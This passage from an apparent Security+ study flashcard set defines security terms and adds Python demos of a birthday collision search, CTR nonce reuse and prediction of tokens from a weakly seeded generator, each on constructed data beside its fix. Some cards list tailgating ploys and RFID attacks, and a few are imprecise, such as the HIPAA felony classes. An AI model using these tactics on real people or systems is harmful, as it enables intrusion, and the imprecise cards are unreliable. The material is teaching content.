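    """SHA-256 truncated to `bits` bits, standing in for a hash with a short output.
    (Real attacks target weak or short hashes; truncation just makes the demo fast.)"""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def expected_birthday_work(bits: int) -> float:
    """Expected number of hashes before the first collision: about sqrt(pi/2 * 2**bits)."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_collision(bits: int, prefix: bytes = b"doc-"):
    """Birthday attack: hash many *different* messages, remember every output, stop at the
    first repeat. Returns (message_a, message_b, hashes_computed)."""
    seen = {}
    for i in count():
        msg = prefix + str(i).encode()
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg


def find_preimage(target: int, bits: int, prefix: bytes = b"forge-"):
    """Contrast: matching one *specific* hash (e.g. a posted checksum) has no birthday shortcut.
    Expected work is about 2**bits, the square of the collision cost."""
    for i in count():
        msg = prefix + str(i).encode()
        if truncated_hash(msg, bits) == target:
            return msg, i + 1
```

With 16 bits the collision usually appears after a few hundred hashes while the preimage search needs tens of thousands; the same ratio is why a 128-bit hash offers only about 64 bits of collision resistance.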

Known-plain text attack(KPA) (2)

an attack where the attacker has encrypted data and some of the corresponding plaintext (the crib). The known pairs may reveal the rest of the plaintext, or the encryption/decryption method, secret keys, etc.

RADIUS

an authentication protocol that centrally authenticates for many different systems across the network.

Impact: Reputation

an event can cause status or character problems

pass the hash

an exploit in which an attacker steals a hashed user credential and, without cracking it, reuses it to trick an authentication system into creating a new authenticated session on the same network.

Object identifiers (OID) (2)

an identifier mechanism for naming any object, concept, or "thing" with a globally unambiguous persistent name. standardized by the International Telecommunications Union (ITU) and ISO/IEC.

Tailgating and ways (3)

an unauthorized individual enters a restricted-access building by following an authorized user through the door. ways: dress like a familiar third-party contractor. join employees on a smoke break and walk back in with them. walk in with your hands full of donuts so someone holds the door.

Directional antennas (2)

antennas that focus the signal in one direction so it travels farther. performance is measured in dB of gain; every additional 3 dB doubles the effective power.

Mission-essential functions examples (4)

any functions to keep the business running: payroll. accounting function. manufacturing facility.

Incident analysis resources

anything that helps you understand what normal operation of the environment looks like (network diagrams, baselines, documentation), so that abnormal activity stands out.

code signing (3)

application code is signed with the developer's private key. a trusted CA signs the developer's public key (the code-signing certificate). provides integrity (the code has not changed since it was signed) and confirms who the publisher was; it says nothing about whether the code is safe.

third-party libraries and SDKs concerns and security (2)

application features vs. unknown possibly insecure code base. (application development speed vs security) need to test library security.

Banner (3)

application information that tells everything about itself. used to communicate between the client and server so everyone knows who's communicating with who. Its usually invisible to users and behind the scenes.

Code signing certificate

application is digitally signed by the developer.

ASLR (2)

randomizes where the executable, libraries, stack and heap are loaded each time a program runs. an overflow exploit that jumps to a hard-coded address works on one run and crashes on the next, so the attacker first needs an information leak.

Ways host-based firewalls can restrict traffic

application, tcp/udp port number

Immutable systems

applications (services or even images?) that can't be modified after being deployed into production.

Privileged user examples (3)

area manager. someone who creates reports from data. someone who handles user and password changes.

Key strength security

as computing power grows, keys have to get longer to keep the same margin of security against brute force.

Key management life cycle: certificate generation

associate a key to a user or device

RSA

asymmetric algorithm that uses two large prime numbers

what kind of encryption does code signing use?

asymmetric encryption

Email Incident Category

attack executed from an email or attachment

Downgrade attack

attack that forces the systems to use weaker security.

Persistent (stored) XSS attack

attack where the attacker stores a script in a page, file or message on the server; every user who later views that content runs the script in their own browser.

(WPA-)Enterprise

authenticates users individually with an authentication server

Unencrypted credentials (2, 4 eg)

authentication sent in cleartext, unencrypted. don't send credentials over unencrypted protocols either: Telnet, FTP, SMTP, IMAP (use SSH, SFTP/FTPS and TLS-protected SMTP/IMAP instead).

Somewhere you are

authentication factor based on geographical location.

Something you are (2)

authentication factor that usually uses biometric authentication stored in a mathematical representation.

Something you have

authentication factor you carry with you.

PAP

legacy authentication protocol that sends the username and password in the clear.

things static code analyzer can't find (2)

authentication issues. insecure cryptography.

CHAP (3)

challenge-response authentication: the password itself is never sent. the server sends a random challenge and the client replies with a hash of the challenge combined with the shared secret (three-way handshake: challenge, response, success/failure). the server re-challenges periodically during the connection, invisibly to the user.

TACACS+

Cisco's AAA protocol for network device administration; widely implemented from Cisco's published draft and finally documented as RFC 8907 in 2020. unlike RADIUS, which encrypts only the password, it encrypts the whole packet body and separates authentication, authorization and accounting.

WiFi-enabled MicroSD cards security concerns (2)

authentication vulnerabilities easy to exploit over WiFi. 3rd party can write an application to access API resulting in data leakage or data loss.

stress testing options (2)

automate existing individual workstations. simulate large workstation loads.

Disablement (3)

automatic result when too many failed login attempts occur. can also be forced by an administrator. better than deleting the account, since deleting may lose important data tied to it.

fuzzing options (3)

available in different platforms and languages, etc. CERT Basic Fuzzing Framework (BFF)

MTTR

average time to restore a system once it fails

Proper error handling security

avoid default messages, write own error messages.

differential backup

backup that copies all files since the last full backup

Incremental backup

backup that copies all files since the last incremental backup.

Advantage of Key stretching

an attacker has to repeat every hashing round for each guess, so every guess costs a lot more time and brute forcing a whole password list becomes impractical.
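Added example (not the page's own): PBKDF2-HMAC-SHA256 from Python's standard library, with a verify routine that reads the salt and iteration count back out of the stored record, and a rough measurement of how many plain SHA-256 guesses fit in the time of one stretched guess. The 600,000 default follows current OWASP guidance for PBKDF2-HMAC-SHA256; the passwords are constructed.

```python
import hashlib
import hmac
import os
import time

# Work factor: OWASP's guidance for PBKDF2-HMAC-SHA256 is 600,000 iterations.
DEFAULT_ITERATIONS = 600_000


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS, salt: bytes = None) -> str:
    """Stretch with PBKDF2-HMAC-SHA256 and return a self-describing record:
    algorithm$iterations$salt$derived_key, so the work factor can be raised later per user."""
    if salt is None:
        salt = os.urandom(16)   # per-password random salt: identical passwords get different records
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return "$".join(("pbkdf2_sha256", str(iterations), salt.hex(), dk.hex()))


def verify_password(password: str, record: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt_hex, dk_hex = record.split("$")
    if algorithm != "pbkdf2_sha256":
        raise ValueError("unsupported record: " + algorithm)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex),
                             int(iterations), dklen=32)
    return hmac.compare_digest(dk.hex(), dk_hex)


def slowdown_factor(iterations: int, rounds: int = 3) -> float:
    """How many plain SHA-256 guesses an attacker could try in the time of one stretched guess."""
    pw, salt = b"correct horse battery staple", b"\x00" * 16   # constructed
    t0 = time.perf_counter()
    for _ in range(rounds):
        hashlib.pbkdf2_hmac("sha256", pw, salt, iterations)
    stretched = (time.perf_counter() - t0) / rounds
    n_plain = rounds * 2000
    t0 = time.perf_counter()
    for _ in range(n_plain):
        hashlib.sha256(salt + pw).digest()
    plain = (time.perf_counter() - t0) / n_plain
    return stretched / plain
```

Storing the iteration count in the record is what lets you raise it over the years without breaking existing logins; bcrypt, scrypt and Argon2 follow the same idea with memory cost added, which is why they are preferred for new systems.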

Geolocation security concerns

bad guys can track you and your phone.

Principles of social engineering: Intimidation (ie)

bad things may happen if you don't help, payroll checks won't be processed, etc.

Content switching

balance applications differently between servers

Moat is an extreme example of?

barricades/bollards

counterintelligence gathering

based on data gathered on the attacker try to determine: what or who they are. attacker's habits that can identify them later

fighting shoulder surfing (2)

be aware of your surroundings. privacy filters on screens.

Strategic intelligence/ counterintelligence gathering: Active logging

best practice is to log as much info as you can. This will have tracked every step attacker took (log everything, don't just automate increased logs when attack starts)

shared accounts security

best practice not to use these accounts

Backup utilities best practices

best practice: complete coverage, fast recovery

Best choice for removing Malware from a system

best recovery is to delete and restore from a good backup

AP signal strength security (3)

best to set as low as possible to limit signal to just inside the building. testing and study may be required. Consider receiver: High-gain antenna can hear more

black box

blind pentest where tester knows nothing about the systems and has to build maps and logically figure out what types of system there are

CTR (counter) (3)

block cipher mode that turns a block cipher into a stream cipher. a nonce concatenated with a counter is encrypted to produce a keystream block, which is XORed with the plaintext; the counter is incremented for each block. because the plaintext enters only through the XOR it can be any length with no padding, down to 8 bits for streaming. the nonce must never repeat under the same key, and CTR alone gives no integrity (that is what GCM adds).
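Added example, not from the original page: CTR mode written out in Python. AES is not in the standard library, so a keyed PRF (HMAC-SHA256 cut to 16 bytes) stands in for the block cipher purely to show the nonce||counter structure, the stream-like XOR and what goes wrong when a nonce repeats; all keys and messages are constructed.

```python
import hashlib
import hmac

BLOCK = 16  # bytes, same block size as AES


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for the block cipher E_k(). The stdlib has no AES, so a keyed PRF
    (HMAC-SHA256 truncated to one block) plays the role; it shows the mode's structure
    only. Real code uses AES-CTR or, better, AES-GCM from a crypto library."""
    if len(block) != BLOCK:
        raise ValueError("block must be %d bytes" % BLOCK)
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """CTR mode. For block i: keystream = E_k(nonce || counter_i); output = data XOR keystream.
    Encryption and decryption are the same call; the last block may be partial (no padding)."""
    if len(nonce) != 8:
        raise ValueError("nonce must be 8 bytes; the other 8 bytes of the block are the counter")
    out = bytearray()
    for counter, offset in enumerate(range(0, len(data), BLOCK)):
        keystream = block_encrypt(key, nonce + counter.to_bytes(8, "big"))
        chunk = data[offset:offset + BLOCK]
        out.extend(a ^ b for a, b in zip(chunk, keystream))   # zip stops at the short side
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def nonce_reuse_leak(key: bytes, nonce: bytes, known_plaintext: bytes, secret_plaintext: bytes) -> bytes:
    """The failure mode: two messages under the same key AND nonce share a keystream, so
    c1 XOR c2 == p1 XOR p2. Knowing p1 hands the attacker p2 without ever touching the key."""
    c1 = ctr_crypt(key, nonce, known_plaintext)
    c2 = ctr_crypt(key, nonce, secret_plaintext)
    return xor_bytes(xor_bytes(c1, c2), known_plaintext)
```

The ciphertext is exactly as long as the plaintext, and flipping a ciphertext bit flips the same plaintext bit undetected, which is why CTR is normally paired with a MAC or replaced by an authenticated mode.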

Faraday cage

blocks electromagnetic fields.

Asymmetric algorithm generation (2)

both keys are created at the same time using randomization, prime numbers, etc. Public key is made public and private key is kept private.

MOA example

both sides agree to promote and support the joint use of their facilities (is an example of)

Zeus/Zbot malware (2)

botnet malware used to clean out bank accounts. commonly combined with Necurs rootkit for hard detection and removal.

DNS amplification DDoS

bots are commanded to send DNS queries that produce large answers (e.g. ANY or DNSKEY records) to open DNS resolvers, with the source address spoofed to the victim's. the resolvers deliver the large responses to the victim, multiplying the bots' bandwidth many times over.

switches

forward frames in hardware (ASICs) based on destination MAC address; essentially a multiport bridge.

Attrition Incident Category example

brute-force attacks

things static code analyzer can find (2)

buffer overflows. database injections

traceroute

builds a router map from one device to a destination. (tracert on windows)

Sensors (2)

built-in into devices to gather metrics. integrated into switches, routers, servers, firewalls, etc.

Mobile Device Payment methods (3 standards)

builtin function that uses NFC to pay with phones. Apple Pay Android Pay Samsung Pay

(Backup) Location Selection: legal implications (2)

business regulations vary between states. personnel must have passports and clear immigration if site outside the country.

Personal email security policies (4)

business use or a mix of business and personal. prohibit disruptive or offensive use. compliance issues. document organisation's definition of personal email e.g. Google Mail

Advantage of change management for risk management (2)

by implementing it: more uptime and availability. decreases risks to entire organization

Cable locks security concerns

the cable can be cut, so it's a short-term deterrent rather than real protection.

Mirai botnet examples (4)

cameras, routers, doorbells, garage door openers, etc

How does Orchestration aid in provisioning? (2, eg)

can automatically add or remove application instances based on whats needed e.g. during night. can add or remove security as well

Key escrow reasons

can be a legitimate business arrangement.

Are Smart cards contact or contactless?

can be both

Signal strength on an AP

can be configured based on how much power is used by the AP

Record time offset (5)

can be done directly from the OS. kept in Windows Registry. document time zone, daylight saving time and any other time change information.

shoulder surfing (methods 3)

can be done with webcams or binoculars, reflections off windows

pseudo-random number generation issues

the sequence is reproducible by anyone who knows, or can brute-force, the starting seed; never use it for keys, session tokens or nonces.
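Added example (not part of the cards): Python's random module seeded from a small space, the way a server issuing session tokens might wrongly do it, and the attacker side that recovers the seed from one observed token and predicts the next ones. The seed space (seconds since midnight) and the tokens are constructed; secrets.token_hex shows the correct alternative.

```python
import random
import secrets

TOKEN_BYTES = 16


def tokens_from_seed(seed: int, count: int) -> list:
    """INSECURE pattern: 'session tokens' from Python's Mersenne Twister seeded with `seed`.
    Same seed, identical token sequence, every time."""
    rng = random.Random(seed)
    return [rng.getrandbits(TOKEN_BYTES * 8).to_bytes(TOKEN_BYTES, "big").hex()
            for _ in range(count)]


def recover_seed(observed_token: str, seed_space: range, lookahead: int = 4):
    """Attacker side: if the server seeded from a small space (e.g. seconds since midnight,
    86,400 values), try every seed, regenerate the first few tokens, stop at the match."""
    for seed in seed_space:
        if observed_token in tokens_from_seed(seed, lookahead):
            return seed
    return None


def predict_next_tokens(seed: int, already_issued: int, count: int) -> list:
    """Replay the generator past the tokens already handed out; what follows are future sessions."""
    return tokens_from_seed(seed, already_issued + count)[already_issued:]


def secure_token() -> str:
    """The fix: the OS CSPRNG. No application-chosen seed, so there is nothing to brute-force."""
    return secrets.token_hex(TOKEN_BYTES)
```

A 128-bit token looks unguessable, but its entropy is only that of the seed; here about 17 bits, a fraction of a second of searching.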

PKCS #12 security

can be password protected since it transfers a private key

how is Infrared used? (2)

can be used for file transfers and to control devices that are IR accessible

printer/MFD security concerns (3)

can be used for reconnaissance i.e. log files for all activity, address books for who received a fax. can print without authentication if security circumvented. may retrieve copies of printed documents from spooling files.

Mobile Device Payment methods security concerns

can be used maliciously if authentication is bypassed

Version control security concerns

can be used to see previous version of confidential data even if current version deleted.

RPO examples (2)

can bring the system back online with a minimum amount of a few days worth of data but can't access a year's worth of archives. can bring a system online but provide availability only to a certain group of people.

capture video (for forensics) (3)

can capture video status on screen for forensics. also use security cameras. and phone

Injecting signals into EMI (2)

can change data captured on sensors. can input info into keyboard input.

Rooting/Jailbreaking security concerns (2)

can circumvent security features e.g. MDM policies. sideload apps without an app store

examples of Geofencing (2)

can disable cameras when inside the office. allow authentications if that device is in a particular area, prevent access if device located in a different country.

Application server secure configurations (3)

can disable unnecessary services. OS/security updates. limit file permission and access

PGP (3)

can encrypt and digitally sign email. asymmetric encryption (RSA) (and symmetric). used as commercial software. owned by Symantec.

Stored procedures concerns and security

if the application builds SQL from user input, a modified request can read or change anything the database account can reach. applications are most secure when they issue no free-form SQL at all and only call pre-defined stored procedures, with user input passed as parameters.

How Network-based Firewalls act as Application-aware security devices

can identify traffic by application (Microsoft SQL Server, Facebook, Twitter, YouTube, etc.) rather than by port alone; can recognize thousands of applications.

What else can HIDS/HIPS detect? (eg)

can inform on activity in the OS. e.g. moved or modified file

Subscription services security (3)

can limit IP addresses where subscription might come from. set up certificates to establish trust. set up public key configuration for encryption.

how far can you limit access on an application server

can limit application server to only communicate to the database server and web server.

Display security concerns (2)

can reconstruct images on screen by listening to EM signals. no authentication or checks for firmware updates, can log info onto screen or ransomware.

TPM Versatile Memory (2)

can store encryption keys. can store configurations of current hardware to check for hardware changes over time.

Wearable technology IoT security concerns (3)

can track our location, where is that data stored? who has access to that data?

Mobile Device External media security concerns

can transfer data from a computer using a mobile device using SD flash memory, USB/lightning drives and walk it out of the building

HVAC security concerns

can turn off air conditioning or heating to make temperature too uncomfortable to work, DoS.

Viewing and converting different file formats (2)

can usually convert between file formats. OpenSSL and similar applications can read and display the certificates in many different formats

Where can you find Patch management tools on Windows?

can view in control panel > programs or all control panel items > programs and features > Installed Updates

Faraday cage security and concerns (2)

can't block all signal types. blocks mobile calls so have emergency call contingency.

Perfect forward secrecy security

each session uses a fresh ephemeral key (DHE/ECDHE), so recorded traffic cannot be decrypted later even if the server's long-term private key is stolen.

WiFi mobile security concerns (3)

capture data. MITM. frequency interference on 2.4/5 GHz

tcpdump (3)

capture packets from the command line in Unix/Linux OS, available for Mac OS X. apply filters, view in real-time. (saved in pcap format so it can be loaded in a protocol analyzer later)

WinDump (3)

capture packets from the command line in Windows. apply filters, view in real-time. (saved in pcap format can be loaded in a protocol analyzer later)

Screenshots (for forensics)

capture the state of the screen

Banner grabbing

capturing a banner with Netcat (nc), Nmap, telnet, etc. to view the application information: product name, software version, server type and so on. defenders should grab their own banners and trim what they reveal.
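Added example, not the page's own code: a Python banner grab (the same HEAD request you would type into nc) against a throwaway HTTP server on loopback, so it runs offline. "ExampleHTTPd/2.4.1" is a constructed product string; the QuietHandler is the hardened side, a generic Server header with no interpreter version.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class ChattyHandler(BaseHTTPRequestHandler):
    """Default-style server: announces product and version in the Server header.
    'ExampleHTTPd/2.4.1' is a constructed product string, not a real server."""
    server_version = "ExampleHTTPd/2.4.1"

    def do_HEAD(self):
        self.send_response(200)   # send_response() adds the Server: and Date: headers
        self.end_headers()

    do_GET = do_HEAD

    def log_message(self, *args):  # keep the demo quiet
        pass


class QuietHandler(ChattyHandler):
    """Hardened variant: generic Server header and no 'Python/x.y' interpreter version."""
    server_version = "webserver"
    sys_version = ""


def grab_banner(host: str, port: int, timeout: float = 3.0):
    """Minimal banner grab: open a TCP connection, send a HEAD request, read the headers,
    return (status line, Server header or None)."""
    request = b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        raw = b""
        while b"\r\n\r\n" not in raw:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *headers = head.split("\r\n")
    for line in headers:
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return status, value.strip()
    return status, None


def probe(handler_cls):
    """Start a throwaway server on a random loopback port, grab its banner, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return grab_banner("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(probe(ChattyHandler))
    print(probe(QuietHandler))
```

The chatty banner tells an attacker exactly which version to look up in a vulnerability database; the quiet one forces them to fingerprint behaviour instead. Hiding the banner is hygiene, not a substitute for patching.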

VDI development (ie)

centralized app development: no need to write application for different platforms, write application for one platform and any one who access it with ( ) has access to the app.

How can you tell what traffic was allowed on a host-based firewall?

centralized log shows what traffic was allowed or blocked

Containment of an incident concerns

certain malware monitor for connectivity and if connection is lost they delete, encrypt or damage everything.

User certificate

certificate associated with a user that acts as an additional authentication factor

(OCSP) stapling (2)

the web server fetches its own OCSP status from the CA periodically and "staples" the CA-signed, time-stamped response to the TLS handshake, so the client does not have to contact the CA itself. the CA's digital signature on the status is what the client trusts.

USB token

certificate on USB device

Smart card security (2)

certificate on the card identifies cryptographically. used with MFA like PIN or fingerprint.

Wildcard domain

certificate that covers every hostname at one level of a domain, e.g. *.example.com matches www.example.com and mail.example.com but not a.b.example.com.

SAN (3)

certificate that support many different domains. extension to an X.509 certificate. lists all additional DNS names associated with the cert

Machine/computer certificate (3)

certificate used to authenticate a device onto a network. can be checked on a VPN connection. management software can validate end devices with it.

Intermediate certificate aka

chain certificate (aka)

Ephemeral keys best practices (2)

change frequently: ideally a fresh key per session, at minimum several times a day. must be unpredictable random values.

MAC spoofing

changing MAC address allowed by most drivers.

Refactoring (2)

changing how malware looks every time it's downloaded to bypass signature-based antivirus. process of changing a software system in such a way that it does not alter the external behavior of the code yet improves its internal structure.

barricades/bollards

channel people through specific points and prevent larger objects from passing through

Web server secure configuration (4)

check and secure: information leakage: banner info, directory browsing. permissions: web server running as a non-privileged account, file permissions properly configured. configure TLS (SSL) and certificates. log files.

Memory management security (3)

check and validate all user data input. make sure data going into memory matches buffer sizes. double check built-in functions of programming languages.

Data exposure security

check every step of all input and output processes.

Provisioning when deploying software to workstations (2)

check for malicious code. verify security of the workstation.

Why would you try wireless attacks on your own network?

check whether your APs are susceptible to attacks such as rogue APs and deauthentication before an attacker does.

(Account management) Usage auditing and review

checking how resources are being used and stored, and if the systems and applications are secure.

(Account management) Permission auditing and review

checking that every one has the correct permissions. often done with scheduled recertification

(Account management) Time-of-day restrictions

checking whether some one is in certain area or accessing certain resources during times those areas and resources shouldn't be accessed

sfc /scannow (2)

checks and repairs core OS files. Provides a log of all the things that pass and that were repaired

File integrity check

checks if malware has modified the core OS and repairs if it has.

Configuration compliance scanner and other ways it is implemented

checks to see if devices meet minimum security configurations that comply with internal requirements for an organization or industry regulations. May be an ongoing audit: monitors changes, can integrate with login process or/and VPN connection

HIPAA non-compliance penalties (2 listed)

class 6 felony: fine up to $50,000 and/or up to 1 year in prison. class 4 felony: fine up to $250,000 and/or up to 10 years in prison.

private data aka (3)

classified. restricted. Internal use only

difference between clear text and plaintext

clear text is readable data transmitted or stored "in the clear". (unencrypted) plaintext is input put into a coding process to create ciphertext.

SSO process with Kerberos

the client authenticates to the KDC's Authentication Service once and receives a ticket granting ticket (TGT). for each service it presents the TGT to the KDC's Ticket Granting Service and receives a service ticket, which it presents to that service. the password is never re-entered and never sent to the services.

Types of Alarms (3)

closed or open circuits. Motion detection. Duress- trigger by person.

Air system HVAC takes advantage of (2)

closed-loop recirculating and positive pressurization system. Internal air is recycled and additional air is pushed out, preventing outside contaminants

Infrastructure as code

cloud-based network devices (and technology stacks) that are deployed by automation based on what application need.

compiled code (4)

code where: the source code is unseen. the application is an executable compiled from the source. it's built for a specific OS and CPU. during compilation some logical bugs can be identified.

Race conditions

coding problem that doesn't take into account of multiple things happening simultaneously.

ECDHE

Elliptic Curve Diffie-Hellman Ephemeral: Diffie-Hellman key exchange on an elliptic curve with a fresh key pair for every session, which provides forward secrecy.

Secure NAT Topology (2)

combined with a stateful firewall for security. alone its not a security mechanism. (bad guy know how to circumvent)

HMAC (2)

combines a hash with a secret key. provides data integrity and authenticity.
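Added example (not from the original page): the difference between an unkeyed hash and an HMAC, shown with a constructed transfer message and shared key. An attacker in the path can recompute a plain hash after tampering, but cannot produce a valid HMAC tag without the key, so only the keyed receiver notices the change.

```python
import hashlib
import hmac

# Constructed sample message (a transfer instruction) and a key shared out of band.
MESSAGE = b"transfer amount=100 to=acct-4711"
SHARED_KEY = b"k3y-shared-out-of-band-by-both-parties"


def plain_digest(msg: bytes) -> str:
    """Unkeyed hash: anyone, including the attacker, can recompute it for any message."""
    return hashlib.sha256(msg).hexdigest()


def mac_tag(key: bytes, msg: bytes) -> str:
    """HMAC-SHA256 tag: only a holder of `key` can compute a valid tag."""
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def receiver_accepts_hash(msg: bytes, digest: str) -> bool:
    """Receiver who only checks an unkeyed hash sent alongside the message (integrity only)."""
    return plain_digest(msg) == digest


def receiver_accepts_mac(key: bytes, msg: bytes, tag: str) -> bool:
    """Receiver who verifies an HMAC tag (integrity + authenticity).
    compare_digest avoids leaking how many leading bytes matched via timing."""
    return hmac.compare_digest(mac_tag(key, msg), tag)


def attacker_rewrite(msg: bytes, intercepted_tag: str):
    """Attacker in the path changes the amount. With a plain hash they simply recompute it.
    With HMAC they have no key, so the best they can do is forward the old tag unchanged.
    Returns (forged message, recomputed plain digest, original tag)."""
    forged = msg.replace(b"amount=100", b"amount=900")
    return forged, plain_digest(forged), intercepted_tag
```

This is also why a hash posted next to a download proves integrity only against accidental corruption unless the hash itself is delivered over a channel the attacker cannot write to.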

GCM (2 def)

combines counter mode (confidentiality) with Galois field authentication; provides data authenticity and integrity as well (an authenticated-encryption, AEAD, mode). as with CTR, the nonce must never repeat under one key.

Geofencing

combines geolocation and MDM policies to restrict or allow features when in a particular area.

DSA uses on mobile devices

combines with elliptic curve cryptography (ECC) to create ECDSA for minimal resource use.

netstat -b

command (Windows): shows active connections and the executable that created each one; needs an elevated prompt

netstat -a

command: shows all active connections and listening ports on the local machine

netstat -n

command: shows all active connections on an individual machine without the resolved names, only IP addresses

arp -a

command: view table with MAC to IP addresses, ARP table

What is pass the hash commonly associated with?

commonly associated with the Microsoft NTLM protocol.

BPA commonly found

commonly seen between manufacturers and resellers

what devices commonly use USB OTG?

commonly seen on android devices

Preparation for an incident (5)

communication methods and who to contact. understand handling hardware and software. Incident analysis resources. Incident mitigation software. Policies for incident handling

COPE

company buys the device for the user to be used as both a corporate and personal device

XOR

compare 2 inputs when the bits are the same the output is 0, when they are different output is 1.

Hash uses (3)

compare stored password hashes without ever storing the actual passwords. (confidentiality) verify a document or download is the same as the original. (integrity) digital signatures, where the hash of the message is what gets signed. (authentication, non-repudiation and integrity)

CBS stands for

component based servicing

pseudo-random number generation

computer generated that approximates true randomness using a starting seed number.

random number generation

computer generated that usually includes some type of natural input

removable media control concerns

concern of portable media like USB and portable drives from infecting systems or exporting data.

Mandatory Access Control Labels (4)

confidential. secret. top secret. etc

How to add encryption to a webserver?

configure TLS (SSL): obtain, install and manage the certificates

Network Infrastructure Devices secure configurations (4)

configure authentication off a back-end known good database, with access for the system administrators. change defaults. Check with manufacturer for rare but important updates

OS secure configurations (4)

configure to automatically stay updated with latest patches. Delete and re-image compromised systems. changes go through change management. Perform regular integrity checks

Fighting Permission issues (3)

confirm permission on initial configuration. Have a process in place for changes and updates. perform periodic audits

Impact

considerations when building a business impact analysis.

Subscription services

constant automated subscription each with its own method of updating

Honeypot concerns

constant battle to discern real from fake

(Account management) recertification

constant checking that users have the correct privileges assigned to their account.

Continuous integration (3)

constant security checks during development as code is added. the bare minimum is a documented security baseline. large-scale security analysis happens during testing.

Automation/scripting: Continuous monitoring

constantly checking for particular events to be able to automatically respond.

PKCS #12

container format for storing X.509 certificates in a single file. binary. often used to transfer a private and public key pair. (along with intermediate certs too) can be password protected

X.500 Directory tree objects (1, 3 eg, 1, 4 eg)

container objects e.g. country, organization, organizational units inside the container objects are leaf objects: Users, computers, printers, files.

Security of Security as a service (2)

continuous monitoring. anti-virus/malware constantly updated without deploying new updates.

Compensating (control)

control that does not stop the attack itself but achieves the intended protection by other means, e.g. restoring from backup when a preventive control has failed.

Detective (control) (2)

control that identifies and records any intrusion attempts. may not prevent access.

Technical controls (2)

controls implemented using systems to limit or prevent an event. OS controls

Administrative controls

controls that determine how people act

Physical controls

controls that physically separate people from our systems

Principles of social engineering: Consensus (ie)

convince based on what's normally expected: "your co-worker gave me this last week"

Passive tap

copies signal and sends to analysis tool.

Capture system image (2)

copy the contents of a storage drive. done with software imaging tools.

code reuse

copying code from one application to another when both need the same process and it's easier than writing the code from scratch; any bug in the original comes along with it.

Mobile Device Camera use security issues (3)

corporate espionage, inappropriate use, very hard to control

Correlation engine (2)

correlates data gathered by the collectors. found in SIEMs.

reason for carrier locking (2)

cost of phone may come out of monthly payments. provider needs to recoup the cost of the phone.

examples of company assets AUP covers (4)

covers: Internet use, telephones, computers, mobile devices, etc

Key management best practice.

create a good set of policies.

Digital certificate creation process (4)

create a key pair, send the public key to the CA to be signed, CA performs checks to verify ownership of domain and web server, provides a digital signature and possibly some additional features

Key management life cycle: key generation

create a key with the requested strength using the proper cipher

Account management:On-boarding

create an account with proper permissions and access by adding them into their proper groups or departments.

what year was PGP created?

created in 1991

Blowfish history

created in 1993. One of the first secure ciphers not limited by patents.

Mesh trust model

cross-certifying CAs.

Master Image

customized image of an ideal server deployment which requires some configuration specific to the server being deployed.

Injection

data added by a user into a data stream where the application does not validate the input, so the data is interpreted as code or a command and produces unexpected output.

VDI

data and application run on remote servers separate from the mobile device.

RFID attacks (4)

data capture: sniff the tag/reader communication, replay attacks. spoof the reader: write your own data to the tag so it is sent back to the original device. jam the signal. default encryption keys are published online and found with a quick search.

Open-source intelligence (OSINT)

data collected from publicly available sources to be used in an intelligence context

cloud storage

data is available anywhere, anytime, on any device with a network connection.

VDI security (2)

data is stored in a secure, centralized area. If a device is lost no data is lost along with the device.

Web server security concerns (2)

data leaks. server access

Email storage being required to be kept for years back is an example of?

data retention (example)

Data owner (2)

data role of someone accountable for specific data. often a senior officer

PII

data that can be used to identify an individual.

Data-at-rest

data that is on a storage device.

Proprietary data (2)

data that is the property of an organization. may also include trade secrets

Data-in-transit

data transmitted over the network

Injection examples

data types include HTML, SQL, XML, LDAP, etc.

private data (2)

data with restricted access. may require non-disclosure agreement to access.

(Account management) Off-boarding

disable the account rather than delete it, since deleting an account can destroy data (and decryption keys) tied to it.

Risk Mitigation (1, e.g.)

decrease the risk level e.g. by investing in security systems

service account security (2)

define access for specific services. determine best policy for password updates

what policies can be set by the MDM for failed password attempts? (3)

delete all the data. completely lock the phone and require input from security team to unlock. slow down the process to prevent brute force.

Blacksheep (3)

designed to detect Firesheep, a tool that captured Facebook session IDs on open wireless networks. no longer relevant since Facebook moved to HTTPS for all traffic.

ARP

resolves an IP address to the corresponding MAC address on the local network.

Network scanner (5)

determines what services and OS are running on a remote device. scan for open ports. scan an IP address or range of IP to identify many devices. Visually map the network. (eg Zenmap) Good way to spot a rogue system

IPS rules (4) (#, how customized) (what about them is most time consuming?)

determine what to do when a signature or vulnerability is matched: block, allow, send an alert, etc. Thousands of rules. Rules can be customized by group or individually. Takes a lot of time to tune the rules and sort out the noise and false positives.

Secure coding techniques: obfuscate. and why?

developers take perfectly readable source code and ship nonsense-looking code that behaves exactly the same as the original. makes it harder for an attacker to read the code and find security holes (it does not remove them).

failing posture assessment (2)

device is sent to quarantined network with just enough access to fix issues. Once resolved retest

Wireless LAN controller (5)

device that centrally manages all WAPs. Deploys new AP. performance and security monitoring. configure and deploy changes to all sites. report AP use. Usually a proprietary system based on the AP being used

fuzzer

tool that sends random or malformed data into the inputs of an application and watches for crashes or unexpected behaviour.

Proxy (useful for? 4)

